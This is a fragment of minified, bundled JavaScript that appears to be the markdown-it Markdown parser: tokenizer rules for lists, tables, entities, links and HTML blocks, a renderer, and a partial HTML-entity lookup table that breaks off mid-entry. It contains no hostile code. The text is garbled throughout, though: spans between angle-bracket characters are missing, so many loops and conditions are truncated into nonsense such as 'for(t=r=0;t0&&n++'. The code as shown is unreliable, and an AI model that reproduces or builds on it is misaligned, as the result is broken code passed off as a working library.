t,r,n=0,s=e.tokens,i=e.tokens.length;for(t=r=0;t0&&n++,"text"===s[t].type&&t+1=0&&32===e.pending.charCodeAt(r))if(r>=1&&32===e.pending.charCodeAt(r-1)){i=r-1;while(i>=1&&32===e.pending.charCodeAt(i-1))i--;e.pending=e.pending.slice(0,i),e.push("hardbreak","br",0)}else e.pending=e.pending.slice(0,-1),e.push("softbreak","br",0);else e.push("softbreak","br",0);o++;while(o3)&&!(e.sCount[c]<0)){for(n=!1,s=0,i=u.length;s=o)return-1;if(r=e.src.charCodeAt(i++),r<48||r>57)return-1;for(;;){if(i>=o)return-1;if(r=e.src.charCodeAt(i++),!(r>=48&&r<=57)){if(41===r||46===r)break;return-1}if(i-s>=10)return-1}return i=4)return!1;if(e.listIndent>=0&&e.sCount[t]-e.listIndent>=4&&e.sCount[t]=e.blkIndent&&(M=!0),(S=i(e,t))>=0){if(f=!0,L=e.bMarks[t]+e.tShift[t],k=Number(e.src.slice(L,S-1)),M&&1!==k)return!1}else{if(!((S=s(e,t))>=0))return!1;f=!1}if(M&&e.skipSpaces(S)>=e.eMarks[t])return!1;if(b=e.src.charCodeAt(S-1),n)return!0;_=e.tokens.length,f?(I=e.push("ordered_list_open","ol",1),1!==k&&(I.attrs=[["start",k]])):I=e.push("bullet_list_open","ul",1),I.map=g=[t,0],I.markup=String.fromCharCode(b),y=t,F=!1,T=e.md.block.ruler.getRules("list"),A=e.parentType,e.parentType="list";while(y=v?1:C-h,p>4&&(p=1),l=h+p,I=e.push("list_item_open","li",1),I.markup=String.fromCharCode(b),I.map=d=[t,0],f&&(I.info=e.src.slice(L,S-1)),E=e.tight,D=e.tShift[t],w=e.sCount[t],x=e.listIndent,e.listIndent=e.blkIndent,e.blkIndent=l,e.tight=!0,e.tShift[t]=c-e.bMarks[t],e.sCount[t]=C,c>=v&&e.isEmpty(t+1)?e.line=Math.min(e.line+2,r):e.md.block.tokenize(e,t,r,!0),e.tight&&!F||(R=!1),F=e.line-t>1&&e.isEmpty(e.line-1),e.blkIndent=e.listIndent,e.listIndent=x,e.tShift[t]=D,e.sCount[t]=w,e.tight=E,I=e.push("list_item_close","li",-1),I.markup=String.fromCharCode(b),y=t=e.line,d[1]=y,c=e.bMarks[t],y>=r)break;if(e.sCount[y]=4)break;for(z=!1,u=0,m=T.length;u=i)break}else e.pending+=e.src[e.pos++]}e.pending&&e.pushPending()},o.prototype.parse=function(e,t,r,n){var s,i,o,a=new this.State(e,t,r,n);for(this.tokenize(a),i=this.ruler2.getRules(""),o=i.length,s=0;s`\\x00-\\x20]+",i="'[^']*'",o='"[^"]*"',a="(?:"+s+"|"+i+"|"+o+")",c="(?:\\s+"+n+"(?:\\s*=\\s*"+a+")?)",u="<[A-Za-z][A-Za-z0-9\\-]*"+c+"*\\s*\\/?>",l="<\\/[A-Za-z][A-Za-z0-9\\-]*\\s*>",p="\x3c!----\x3e|\x3c!--(?:-?[^>-])(?:-?[^-])*--\x3e",h="<[?][\\s\\S]*?[?]>",f="]*>",d="",m=new RegExp("^(?:"+u+"|"+l+"|"+p+"|"+h+"|"+f+"|"+d+")"),g=new RegExp("^(?:"+u+"|"+l+")");e.exports.HTML_TAG_RE=m,e.exports.HTML_OPEN_CLOSE_TAG_RE=g},"5b54":function(e,t,r){"use strict";var n=r("bd68"),s=r("0068").has,i=r("0068").isValidEntityCode,o=r("0068").fromCodePoint,a=/^&#((?:x[a-f0-9]{1,6}|[0-9]{1,7}));/i,c=/^&([a-z][a-z0-9]{1,31});/i;e.exports=function(e,t){var r,u,l,p,h=e.pos,f=e.posMax;if(38!==e.src.charCodeAt(h))return!1;if(h+1>=f)return!1;if(r=e.src.charCodeAt(h+1),35===r){if(l=e.src.slice(h).match(a),l)return t||(u="x"===l[1][0].toLowerCase()?parseInt(l[1].slice(1),16):parseInt(l[1],10),p=e.push("text_special","",0),p.content=i(u)?o(u):o(65533),p.markup=l[0],p.info="entity"),e.pos+=l[0].length,!0}else if(l=e.src.slice(h).match(c),l&&s(n,l[1]))return t||(p=e.push("text_special","",0),p.content=n[l[1]],p.markup=l[0],p.info="entity"),e.pos+=l[0].length,!0;return!1}},"5fbd":function(e,t,r){"use strict";var n=r("e1f3"),s=r("5706").HTML_OPEN_CLOSE_TAG_RE,i=[[/^<(script|pre|style|textarea)(?=(\s|>|$))/i,/<\/(script|pre|style|textarea)>/i,!0],[/^/,!0],[/^<\?/,/\?>/,!0],[/^/,!0],[/^/,!0],[new RegExp("^|$))","i"),/^$/,!0],[new RegExp(s.source+"\\s*$"),/^$/,!1]];e.exports=function(e,t,r,n){var s,o,a,c,u=e.bMarks[t]+e.tShift[t],l=e.eMarks[t];if(e.sCount[t]-e.blkIndent>=4)return!1;if(!e.md.options.html)return!1;if(60!==e.src.charCodeAt(u))return!1;for(c=e.src.slice(u,l),s=0;s?@[]^_`{|}~-".split("").forEach((function(e){s[e.charCodeAt(0)]=1})),e.exports=function(e,t){var r,i,o,a,c,u=e.pos,l=e.posMax;if(92!==e.src.charCodeAt(u))return!1;if(u++,u>=l)return!1;if(r=e.src.charCodeAt(u),10===r){t||e.push("hardbreak","br",0),u++;while(u=55296&&r<=56319&&u+1=56320&&i<=57343&&(a+=e.src[u+1],u++)),o="\\"+a,t||(c=e.push("text_special","",0),r<256&&0!==s[r]?c.content=a:c.content=o,c.markup=o,c.info="escape"),e.pos=u+1,!0}},"6e83":function(e,t,r){"use strict";var n=/(?:^|[^a-z0-9.+-])([a-z][a-z0-9.+-]*)$/i;e.exports=function(e,t){var r,s,i,o,a,c,u,l;return!!e.md.options.linkify&&(!(e.linkLevel>0)&&(r=e.pos,s=e.posMax,!(r+3>s)&&(58===e.src.charCodeAt(r)&&(47===e.src.charCodeAt(r+1)&&(47===e.src.charCodeAt(r+2)&&(i=e.pending.match(n),!!i&&(o=i[1],a=e.md.linkify.matchAtStart(e.src.slice(r-o.length)),!!a&&(c=a.url,c=c.replace(/\*+$/,""),u=e.md.normalizeLink(c),!!e.md.validateLink(u)&&(t||(e.pending=e.pending.slice(0,-o.length),l=e.push("link_open","a",1),l.attrs=[["href",u]],l.markup="linkify",l.info="auto",l=e.push("text","",0),l.content=e.md.normalizeLinkText(c),l=e.push("link_close","a",-1),l.markup="linkify",l.info="auto"),e.pos+=c.length-o.length,!0)))))))))}},"6fd1":function(e,t){e.exports=/[\xAD\u0600-\u0605\u061C\u06DD\u070F\u08E2\u180E\u200B-\u200F\u202A-\u202E\u2060-\u2064\u2066-\u206F\uFEFF\uFFF9-\uFFFB]|\uD804[\uDCBD\uDCCD]|\uD82F[\uDCA0-\uDCA3]|\uD834[\uDD73-\uDD7A]|\uDB40[\uDC01\uDC20-\uDC7F]/},7133:function(e,t,r){"use strict";var n=r("096b");function s(e,t,r){this.src=e,this.env=r,this.tokens=[],this.inlineMode=!1,this.md=t}s.prototype.Token=n,e.exports=s},7696:function(e,t,r){"use strict";var n=r("4883"),s=[["table",r("80d3"),["paragraph","reference"]],["code",r("9c12")],["fence",r("bf2b"),["paragraph","reference","blockquote","list"]],["blockquote",r("e80e"),["paragraph","reference","blockquote","list"]],["hr",r("fdfe"),["paragraph","reference","blockquote","list"]],["list",r("4b3e"),["paragraph","reference","blockquote"]],["reference",r("d670")],["html_block",r("5fbd"),["paragraph","reference","blockquote"]],["heading",r("0758"),["paragraph","reference","blockquote"]],["lheading",r("199e")],["paragraph",r("44a8")]];function i(){this.ruler=new n;for(var e=0;e=r)break;if(e.sCount[a]=u){e.line=r;break}for(s=0;s"+i(e[t].content)+""},o.code_block=function(e,t,r,n,s){var o=e[t];return""+i(e[t].content)+"\n"},o.fence=function(e,t,r,n,o){var a,c,u,l,p,h=e[t],f=h.info?s(h.info).trim():"",d="",m="";return f&&(u=f.split(/(\s+)/g),d=u[0],m=u.slice(2).join("")),a=r.highlight&&r.highlight(h.content,d,m)||i(h.content),0===a.indexOf(""+a+"\n"):"
"+a+"
\n"},o.image=function(e,t,r,n,s){var i=e[t];return i.attrs[i.attrIndex("alt")][1]=s.renderInlineAsText(i.children,r,n),s.renderToken(e,t,r)},o.hardbreak=function(e,t,r){return r.xhtmlOut?"
\n":"
\n"},o.softbreak=function(e,t,r){return r.breaks?r.xhtmlOut?"
\n":"
\n":"\n"},o.text=function(e,t){return i(e[t].content)},o.html_block=function(e,t){return e[t].content},o.html_inline=function(e,t){return e[t].content},a.prototype.renderAttrs=function(e){var t,r,n;if(!e.attrs)return"";for(n="",t=0,r=e.attrs.length;t\n":">",s)},a.prototype.renderInline=function(e,t,r){for(var n,s="",i=this.rules,o=0,a=e.length;o=r)return c;if(i=e.charCodeAt(t),34!==i&&39!==i&&40!==i)return c;t++,40===i&&(i=41);while(tr)return!1;if(h=t+1,e.sCount[h]=4)return!1;if(u=e.bMarks[h]+e.tShift[h],u>=e.eMarks[h])return!1;if(x=e.src.charCodeAt(u++),124!==x&&45!==x&&58!==x)return!1;if(u>=e.eMarks[h])return!1;if(A=e.src.charCodeAt(u++),124!==A&&45!==A&&58!==A&&!n(A))return!1;if(45===x&&n(A))return!1;while(u=4)return!1;if(f=i(c),f.length&&""===f[0]&&f.shift(),f.length&&""===f[f.length-1]&&f.pop(),d=f.length,0===d||d!==g.length)return!1;if(o)return!0;for(v=e.parentType,e.parentType="table",C=e.md.block.ruler.getRules("blockquote"),m=e.push("table_open","table",1),m.map=b=[t,0],m=e.push("thead_open","thead",1),m.map=[t,t+1],m=e.push("tr_open","tr",1),m.map=[t,t+1],l=0;l=4)break;for(f=i(c),f.length&&""===f[0]&&f.shift(),f.length&&""===f[f.length-1]&&f.pop(),h===t+2&&(m=e.push("tbody_open","tbody",1),m.map=k=[t+2,0]),m=e.push("tr_open","tr",1),m.map=[h,h+1],l=0;l0&&this.level++,this.tokens.push(s),s},i.prototype.isEmpty=function(e){return this.bMarks[e]+this.tShift[e]>=this.eMarks[e]},i.prototype.skipEmptyLines=function(e){for(var t=this.lineMax;et)if(!s(this.src.charCodeAt(--e)))return e+1;return e},i.prototype.skipChars=function(e,t){for(var r=this.src.length;er)if(t!==this.src.charCodeAt(--e))return e+1;return e},i.prototype.getLines=function(e,t,r,n){var i,o,a,c,u,l,p,h=e;if(e>=t)return"";for(l=new Array(t-e),i=0;hr?new Array(o-r+1).join(" ")+this.src.slice(c,u):this.src.slice(c,u)}return l.join("")},i.prototype.Token=n,e.exports=i},"838d":function(e,t,r){"use strict";function n(e,t){var r,n,s,i,o,a,c,u,l={},p=t.length;if(p){var h=0,f=-2,d=[];for(r=0;ro;n-=d[n]+1)if(i=t[n],i.marker===s.marker&&i.open&&i.end<0&&(c=!1,(i.close||s.open)&&(i.length+s.length)%3===0&&(i.length%3===0&&s.length%3===0||(c=!0)),!c)){u=n>0&&!t[n-1].open?d[n-1]+1:0,d[r]=r-n+u,d[n]=u,s.open=!1,i.end=r,i.close=!1,a=-1,f=-2;break}-1!==a&&(l[s.marker][(s.open?3:0)+(s.length||0)%3]=a)}}}e.exports=function(e){var t,r=e.tokens_meta,s=e.tokens_meta.length;for(n(e,e.delimiters),t=0;t=55296&&c<=57343?"���":String.fromCharCode(c),t+=6):240===(248&s)&&t+91114111?u+="����":(c-=65536,u+=String.fromCharCode(55296+(c>>10),56320+(1023&c))),t+=9):u+="�";return u}))}i.defaultChars=";/?:@&=+$,#",i.componentChars="",e.exports=i},"922c":function(e,t,r){"use strict";function n(e,t){var r,n,s,i,o,a=[],c=t.length;for(r=0;r=k)return!1;for(g=l,h=e.md.helpers.parseLinkDestination(e.src,l,e.posMax),h.ok&&(_=e.md.normalizeLink(h.str),e.md.validateLink(_)?l=h.pos:_=""),g=l;l=k||41!==e.src.charCodeAt(l))return e.pos=b,!1;l++}else{if("undefined"===typeof e.env.references)return!1;if(l=0?a=e.src.slice(g,l++):l=c+1):l=c+1,a||(a=e.src.slice(u,c)),p=e.env.references[n(a)],!p)return e.pos=b,!1;_=p.href,f=p.title}return t||(o=e.src.slice(u,c),e.md.inline.parse(o,e.md,e.env,m=[]),d=e.push("image","img",0),d.attrs=r=[["src",_],["alt",""]],d.children=m,d.content=o,f&&r.push(["title",f])),e.pos=l,e.posMax=k,!0}},"943c":function(e,t,r){"use strict";e.exports=function(e){var t,r,n,s,i,o,a=e.tokens;for(t=0,r=a.length;t\s]/i.test(e)}function i(e){return/^<\/a\s*>/i.test(e)}e.exports=function(e){var t,r,o,a,c,u,l,p,h,f,d,m,g,_,b,k,v,y=e.tokens;if(e.md.options.linkify)for(r=0,o=y.length;r=0;t--)if(u=a[t],"link_close"!==u.type){if("html_inline"===u.type&&(s(u.content)&&g>0&&g--,i(u.content)&&g++),!(g>0)&&"text"===u.type&&e.md.linkify.test(u.content)){for(h=u.content,v=e.md.linkify.match(h),l=[],m=u.level,d=0,v.length>0&&0===v[0].index&&t>0&&"text_special"===a[t-1].type&&(v=v.slice(1)),p=0;pd&&(c=new e.Token("text","",0),c.content=h.slice(d,f),c.level=m,l.push(c)),c=new e.Token("link_open","a",1),c.attrs=[["href",b]],c.level=m++,c.markup="linkify",c.info="auto",l.push(c),c=new e.Token("text","",0),c.content=k,c.level=m,l.push(c),c=new e.Token("link_close","a",-1),c.level=--m,c.markup="linkify",c.info="auto",l.push(c),d=v[p].lastIndex);d=4))break;n++,s=n}return e.line=s,i=e.push("code_block","code",0),i.content=e.getLines(t,s,4+e.blkIndent,!1)+"\n",i.map=[t,e.line],!0}},a124:function(e,t,r){"use strict";e.exports=function(e){var t,r,n,s=e.tokens;for(r=0,n=s.length;r2)if(u=g(u),t=u.charCodeAt(0),43===t||45===t){if(r=u.charCodeAt(2),88===r||120===r)return NaN}else if(48===t){switch(u.charCodeAt(1)){case 66:case 98:n=2,s=49;break;case 79:case 111:n=8,s=55;break;default:return+u}for(i=u.slice(2),o=i.length,a=0;as)return NaN;return parseInt(i,n)}return+u};if(i(_,!b(" 0o1")||!b("0b1")||b("+0x1"))){for(var C,x=function(e){var t=arguments.length<1?0:e,r=this;return r instanceof x&&(v?p((function(){k.valueOf.call(r)})):c(r)!=_)?u(new b(y(t)),r,x):y(t)},A=n?f(b):"MAX_VALUE,MIN_VALUE,NaN,NEGATIVE_INFINITY,POSITIVE_INFINITY,EPSILON,isFinite,isInteger,isNaN,isSafeInteger,MAX_SAFE_INTEGER,MIN_SAFE_INTEGER,parseFloat,parseInt,isInteger".split(","),w=0;A.length>w;w++)a(b,C=A[w])&&!a(x,C)&&m(x,C,d(b,C));x.prototype=k,k.constructor=x,o(s,_,x)}},aced:function(e){e.exports=JSON.parse('{"Aacute":"Á","aacute":"á","Abreve":"Ă","abreve":"ă","ac":"∾","acd":"∿","acE":"∾̳","Acirc":"Â","acirc":"â","acute":"´","Acy":"А","acy":"а","AElig":"Æ","aelig":"æ","af":"⁡","Afr":"𝔄","afr":"𝔞","Agrave":"À","agrave":"à","alefsym":"ℵ","aleph":"ℵ","Alpha":"Α","alpha":"α","Amacr":"Ā","amacr":"ā","amalg":"⨿","amp":"&","AMP":"&","andand":"⩕","And":"⩓","and":"∧","andd":"⩜","andslope":"⩘","andv":"⩚","ang":"∠","ange":"⦤","angle":"∠","angmsdaa":"⦨","angmsdab":"⦩","angmsdac":"⦪","angmsdad":"⦫","angmsdae":"⦬","angmsdaf":"⦭","angmsdag":"⦮","angmsdah":"⦯","angmsd":"∡","angrt":"∟","angrtvb":"⊾","angrtvbd":"⦝","angsph":"∢","angst":"Å","angzarr":"⍼","Aogon":"Ą","aogon":"ą","Aopf":"𝔸","aopf":"𝕒","apacir":"⩯","ap":"≈","apE":"⩰","ape":"≊","apid":"≋","apos":"\'","ApplyFunction":"⁡","approx":"≈","approxeq":"≊","Aring":"Å","aring":"å","Ascr":"𝒜","ascr":"𝒶","Assign":"≔","ast":"*","asymp":"≈","asympeq":"≍","Atilde":"Ã","atilde":"ã","Auml":"Ä","auml":"ä","awconint":"∳","awint":"⨑","backcong":"≌","backepsilon":"϶","backprime":"‵","backsim":"∽","backsimeq":"⋍","Backslash":"∖","Barv":"⫧","barvee":"⊽","barwed":"⌅","Barwed":"⌆","barwedge":"⌅","bbrk":"⎵","bbrktbrk":"⎶","bcong":"≌","Bcy":"Б","bcy":"б","bdquo":"„","becaus":"∵","because":"∵","Because":"∵","bemptyv":"⦰","bepsi":"϶","bernou":"ℬ","Bernoullis":"ℬ","Beta":"Β","beta":"β","beth":"ℶ","between":"≬","Bfr":"𝔅","bfr":"𝔟","bigcap":"⋂","bigcirc":"◯","bigcup":"⋃","bigodot":"⨀","bigoplus":"⨁","bigotimes":"⨂","bigsqcup":"⨆","bigstar":"★","bigtriangledown":"▽","bigtriangleup":"△","biguplus":"⨄","bigvee":"⋁","bigwedge":"⋀","bkarow":"⤍","blacklozenge":"⧫","blacksquare":"▪","blacktriangle":"▴","blacktriangledown":"▾","blacktriangleleft":"◂","blacktriangleright":"▸","blank":"␣","blk12":"▒","blk14":"░","blk34":"▓","block":"█","bne":"=⃥","bnequiv":"≡⃥","bNot":"⫭","bnot":"⌐","Bopf":"𝔹","bopf":"𝕓","bot":"⊥","bottom":"⊥","bowtie":"⋈","boxbox":"⧉","boxdl":"┐","boxdL":"╕","boxDl":"╖","boxDL":"╗","boxdr":"┌","boxdR":"╒","boxDr":"╓","boxDR":"╔","boxh":"─","boxH":"═","boxhd":"┬","boxHd":"╤","boxhD":"╥","boxHD":"╦","boxhu":"┴","boxHu":"╧","boxhU":"╨","boxHU":"╩","boxminus":"⊟","boxplus":"⊞","boxtimes":"⊠","boxul":"┘","boxuL":"╛","boxUl":"╜","boxUL":"╝","boxur":"└","boxuR":"╘","boxUr":"╙","boxUR":"╚","boxv":"│","boxV":"║","boxvh":"┼","boxvH":"╪","boxVh":"╫","boxVH":"╬","boxvl":"┤","boxvL":"╡","boxVl":"╢","boxVL":"╣","boxvr":"├","boxvR":"╞","boxVr":"╟","boxVR":"╠","bprime":"‵","breve":"˘","Breve":"˘","brvbar":"¦","bscr":"𝒷","Bscr":"ℬ","bsemi":"⁏","bsim":"∽","bsime":"⋍","bsolb":"⧅","bsol":"\\\\","bsolhsub":"⟈","bull":"•","bullet":"•","bump":"≎","bumpE":"⪮","bumpe":"≏","Bumpeq":"≎","bumpeq":"≏","Cacute":"Ć","cacute":"ć","capand":"⩄","capbrcup":"⩉","capcap":"⩋","cap":"∩","Cap":"⋒","capcup":"⩇","capdot":"⩀","CapitalDifferentialD":"ⅅ","caps":"∩︀","caret":"⁁","caron":"ˇ","Cayleys":"ℭ","ccaps":"⩍","Ccaron":"Č","ccaron":"č","Ccedil":"Ç","ccedil":"ç","Ccirc":"Ĉ","ccirc":"ĉ","Cconint":"∰","ccups":"⩌","ccupssm":"⩐","Cdot":"Ċ","cdot":"ċ","cedil":"¸","Cedilla":"¸","cemptyv":"⦲","cent":"¢","centerdot":"·","CenterDot":"·","cfr":"𝔠","Cfr":"ℭ","CHcy":"Ч","chcy":"ч","check":"✓","checkmark":"✓","Chi":"Χ","chi":"χ","circ":"ˆ","circeq":"≗","circlearrowleft":"↺","circlearrowright":"↻","circledast":"⊛","circledcirc":"⊚","circleddash":"⊝","CircleDot":"⊙","circledR":"®","circledS":"Ⓢ","CircleMinus":"⊖","CirclePlus":"⊕","CircleTimes":"⊗","cir":"○","cirE":"⧃","cire":"≗","cirfnint":"⨐","cirmid":"⫯","cirscir":"⧂","ClockwiseContourIntegral":"∲","CloseCurlyDoubleQuote":"”","CloseCurlyQuote":"’","clubs":"♣","clubsuit":"♣","colon":":","Colon":"∷","Colone":"⩴","colone":"≔","coloneq":"≔","comma":",","commat":"@","comp":"∁","compfn":"∘","complement":"∁","complexes":"ℂ","cong":"≅","congdot":"⩭","Congruent":"≡","conint":"∮","Conint":"∯","ContourIntegral":"∮","copf":"𝕔","Copf":"ℂ","coprod":"∐","Coproduct":"∐","copy":"©","COPY":"©","copysr":"℗","CounterClockwiseContourIntegral":"∳","crarr":"↵","cross":"✗","Cross":"⨯","Cscr":"𝒞","cscr":"𝒸","csub":"⫏","csube":"⫑","csup":"⫐","csupe":"⫒","ctdot":"⋯","cudarrl":"⤸","cudarrr":"⤵","cuepr":"⋞","cuesc":"⋟","cularr":"↶","cularrp":"⤽","cupbrcap":"⩈","cupcap":"⩆","CupCap":"≍","cup":"∪","Cup":"⋓","cupcup":"⩊","cupdot":"⊍","cupor":"⩅","cups":"∪︀","curarr":"↷","curarrm":"⤼","curlyeqprec":"⋞","curlyeqsucc":"⋟","curlyvee":"⋎","curlywedge":"⋏","curren":"¤","curvearrowleft":"↶","curvearrowright":"↷","cuvee":"⋎","cuwed":"⋏","cwconint":"∲","cwint":"∱","cylcty":"⌭","dagger":"†","Dagger":"‡","daleth":"ℸ","darr":"↓","Darr":"↡","dArr":"⇓","dash":"‐","Dashv":"⫤","dashv":"⊣","dbkarow":"⤏","dblac":"˝","Dcaron":"Ď","dcaron":"ď","Dcy":"Д","dcy":"д","ddagger":"‡","ddarr":"⇊","DD":"ⅅ","dd":"ⅆ","DDotrahd":"⤑","ddotseq":"⩷","deg":"°","Del":"∇","Delta":"Δ","delta":"δ","demptyv":"⦱","dfisht":"⥿","Dfr":"𝔇","dfr":"𝔡","dHar":"⥥","dharl":"⇃","dharr":"⇂","DiacriticalAcute":"´","DiacriticalDot":"˙","DiacriticalDoubleAcute":"˝","DiacriticalGrave":"`","DiacriticalTilde":"˜","diam":"⋄","diamond":"⋄","Diamond":"⋄","diamondsuit":"♦","diams":"♦","die":"¨","DifferentialD":"ⅆ","digamma":"ϝ","disin":"⋲","div":"÷","divide":"÷","divideontimes":"⋇","divonx":"⋇","DJcy":"Ђ","djcy":"ђ","dlcorn":"⌞","dlcrop":"⌍","dollar":"$","Dopf":"𝔻","dopf":"𝕕","Dot":"¨","dot":"˙","DotDot":"⃜","doteq":"≐","doteqdot":"≑","DotEqual":"≐","dotminus":"∸","dotplus":"∔","dotsquare":"⊡","doublebarwedge":"⌆","DoubleContourIntegral":"∯","DoubleDot":"¨","DoubleDownArrow":"⇓","DoubleLeftArrow":"⇐","DoubleLeftRightArrow":"⇔","DoubleLeftTee":"⫤","DoubleLongLeftArrow":"⟸","DoubleLongLeftRightArrow":"⟺","DoubleLongRightArrow":"⟹","DoubleRightArrow":"⇒","DoubleRightTee":"⊨","DoubleUpArrow":"⇑","DoubleUpDownArrow":"⇕","DoubleVerticalBar":"∥","DownArrowBar":"⤓","downarrow":"↓","DownArrow":"↓","Downarrow":"⇓","DownArrowUpArrow":"⇵","DownBreve":"̑","downdownarrows":"⇊","downharpoonleft":"⇃","downharpoonright":"⇂","DownLeftRightVector":"⥐","DownLeftTeeVector":"⥞","DownLeftVectorBar":"⥖","DownLeftVector":"↽","DownRightTeeVector":"⥟","DownRightVectorBar":"⥗","DownRightVector":"⇁","DownTeeArrow":"↧","DownTee":"⊤","drbkarow":"⤐","drcorn":"⌟","drcrop":"⌌","Dscr":"𝒟","dscr":"𝒹","DScy":"Ѕ","dscy":"ѕ","dsol":"⧶","Dstrok":"Đ","dstrok":"đ","dtdot":"⋱","dtri":"▿","dtrif":"▾","duarr":"⇵","duhar":"⥯","dwangle":"⦦","DZcy":"Џ","dzcy":"џ","dzigrarr":"⟿","Eacute":"É","eacute":"é","easter":"⩮","Ecaron":"Ě","ecaron":"ě","Ecirc":"Ê","ecirc":"ê","ecir":"≖","ecolon":"≕","Ecy":"Э","ecy":"э","eDDot":"⩷","Edot":"Ė","edot":"ė","eDot":"≑","ee":"ⅇ","efDot":"≒","Efr":"𝔈","efr":"𝔢","eg":"⪚","Egrave":"È","egrave":"è","egs":"⪖","egsdot":"⪘","el":"⪙","Element":"∈","elinters":"⏧","ell":"ℓ","els":"⪕","elsdot":"⪗","Emacr":"Ē","emacr":"ē","empty":"∅","emptyset":"∅","EmptySmallSquare":"◻","emptyv":"∅","EmptyVerySmallSquare":"▫","emsp13":" ","emsp14":" ","emsp":" ","ENG":"Ŋ","eng":"ŋ","ensp":" ","Eogon":"Ę","eogon":"ę","Eopf":"𝔼","eopf":"𝕖","epar":"⋕","eparsl":"⧣","eplus":"⩱","epsi":"ε","Epsilon":"Ε","epsilon":"ε","epsiv":"ϵ","eqcirc":"≖","eqcolon":"≕","eqsim":"≂","eqslantgtr":"⪖","eqslantless":"⪕","Equal":"⩵","equals":"=","EqualTilde":"≂","equest":"≟","Equilibrium":"⇌","equiv":"≡","equivDD":"⩸","eqvparsl":"⧥","erarr":"⥱","erDot":"≓","escr":"ℯ","Escr":"ℰ","esdot":"≐","Esim":"⩳","esim":"≂","Eta":"Η","eta":"η","ETH":"Ð","eth":"ð","Euml":"Ë","euml":"ë","euro":"€","excl":"!","exist":"∃","Exists":"∃","expectation":"ℰ","exponentiale":"ⅇ","ExponentialE":"ⅇ","fallingdotseq":"≒","Fcy":"Ф","fcy":"ф","female":"♀","ffilig":"ffi","fflig":"ff","ffllig":"ffl","Ffr":"𝔉","ffr":"𝔣","filig":"fi","FilledSmallSquare":"◼","FilledVerySmallSquare":"▪","fjlig":"fj","flat":"♭","fllig":"fl","fltns":"▱","fnof":"ƒ","Fopf":"𝔽","fopf":"𝕗","forall":"∀","ForAll":"∀","fork":"⋔","forkv":"⫙","Fouriertrf":"ℱ","fpartint":"⨍","frac12":"½","frac13":"⅓","frac14":"¼","frac15":"⅕","frac16":"⅙","frac18":"⅛","frac23":"⅔","frac25":"⅖","frac34":"¾","frac35":"⅗","frac38":"⅜","frac45":"⅘","frac56":"⅚","frac58":"⅝","frac78":"⅞","frasl":"⁄","frown":"⌢","fscr":"𝒻","Fscr":"ℱ","gacute":"ǵ","Gamma":"Γ","gamma":"γ","Gammad":"Ϝ","gammad":"ϝ","gap":"⪆","Gbreve":"Ğ","gbreve":"ğ","Gcedil":"Ģ","Gcirc":"Ĝ","gcirc":"ĝ","Gcy":"Г","gcy":"г","Gdot":"Ġ","gdot":"ġ","ge":"≥","gE":"≧","gEl":"⪌","gel":"⋛","geq":"≥","geqq":"≧","geqslant":"⩾","gescc":"⪩","ges":"⩾","gesdot":"⪀","gesdoto":"⪂","gesdotol":"⪄","gesl":"⋛︀","gesles":"⪔","Gfr":"𝔊","gfr":"𝔤","gg":"≫","Gg":"⋙","ggg":"⋙","gimel":"ℷ","GJcy":"Ѓ","gjcy":"ѓ","gla":"⪥","gl":"≷","glE":"⪒","glj":"⪤","gnap":"⪊","gnapprox":"⪊","gne":"⪈","gnE":"≩","gneq":"⪈","gneqq":"≩","gnsim":"⋧","Gopf":"𝔾","gopf":"𝕘","grave":"`","GreaterEqual":"≥","GreaterEqualLess":"⋛","GreaterFullEqual":"≧","GreaterGreater":"⪢","GreaterLess":"≷","GreaterSlantEqual":"⩾","GreaterTilde":"≳","Gscr":"𝒢","gscr":"ℊ","gsim":"≳","gsime":"⪎","gsiml":"⪐","gtcc":"⪧","gtcir":"⩺","gt":">","GT":">","Gt":"≫","gtdot":"⋗","gtlPar":"⦕","gtquest":"⩼","gtrapprox":"⪆","gtrarr":"⥸","gtrdot":"⋗","gtreqless":"⋛","gtreqqless":"⪌","gtrless":"≷","gtrsim":"≳","gvertneqq":"≩︀","gvnE":"≩︀","Hacek":"ˇ","hairsp":" ","half":"½","hamilt":"ℋ","HARDcy":"Ъ","hardcy":"ъ","harrcir":"⥈","harr":"↔","hArr":"⇔","harrw":"↭","Hat":"^","hbar":"ℏ","Hcirc":"Ĥ","hcirc":"ĥ","hearts":"♥","heartsuit":"♥","hellip":"…","hercon":"⊹","hfr":"𝔥","Hfr":"ℌ","HilbertSpace":"ℋ","hksearow":"⤥","hkswarow":"⤦","hoarr":"⇿","homtht":"∻","hookleftarrow":"↩","hookrightarrow":"↪","hopf":"𝕙","Hopf":"ℍ","horbar":"―","HorizontalLine":"─","hscr":"𝒽","Hscr":"ℋ","hslash":"ℏ","Hstrok":"Ħ","hstrok":"ħ","HumpDownHump":"≎","HumpEqual":"≏","hybull":"⁃","hyphen":"‐","Iacute":"Í","iacute":"í","ic":"⁣","Icirc":"Î","icirc":"î","Icy":"И","icy":"и","Idot":"İ","IEcy":"Е","iecy":"е","iexcl":"¡","iff":"⇔","ifr":"𝔦","Ifr":"ℑ","Igrave":"Ì","igrave":"ì","ii":"ⅈ","iiiint":"⨌","iiint":"∭","iinfin":"⧜","iiota":"℩","IJlig":"IJ","ijlig":"ij","Imacr":"Ī","imacr":"ī","image":"ℑ","ImaginaryI":"ⅈ","imagline":"ℐ","imagpart":"ℑ","imath":"ı","Im":"ℑ","imof":"⊷","imped":"Ƶ","Implies":"⇒","incare":"℅","in":"∈","infin":"∞","infintie":"⧝","inodot":"ı","intcal":"⊺","int":"∫","Int":"∬","integers":"ℤ","Integral":"∫","intercal":"⊺","Intersection":"⋂","intlarhk":"⨗","intprod":"⨼","InvisibleComma":"⁣","InvisibleTimes":"⁢","IOcy":"Ё","iocy":"ё","Iogon":"Į","iogon":"į","Iopf":"𝕀","iopf":"𝕚","Iota":"Ι","iota":"ι","iprod":"⨼","iquest":"¿","iscr":"𝒾","Iscr":"ℐ","isin":"∈","isindot":"⋵","isinE":"⋹","isins":"⋴","isinsv":"⋳","isinv":"∈","it":"⁢","Itilde":"Ĩ","itilde":"ĩ","Iukcy":"І","iukcy":"і","Iuml":"Ï","iuml":"ï","Jcirc":"Ĵ","jcirc":"ĵ","Jcy":"Й","jcy":"й","Jfr":"𝔍","jfr":"𝔧","jmath":"ȷ","Jopf":"𝕁","jopf":"𝕛","Jscr":"𝒥","jscr":"𝒿","Jsercy":"Ј","jsercy":"ј","Jukcy":"Є","jukcy":"є","Kappa":"Κ","kappa":"κ","kappav":"ϰ","Kcedil":"Ķ","kcedil":"ķ","Kcy":"К","kcy":"к","Kfr":"𝔎","kfr":"𝔨","kgreen":"ĸ","KHcy":"Х","khcy":"х","KJ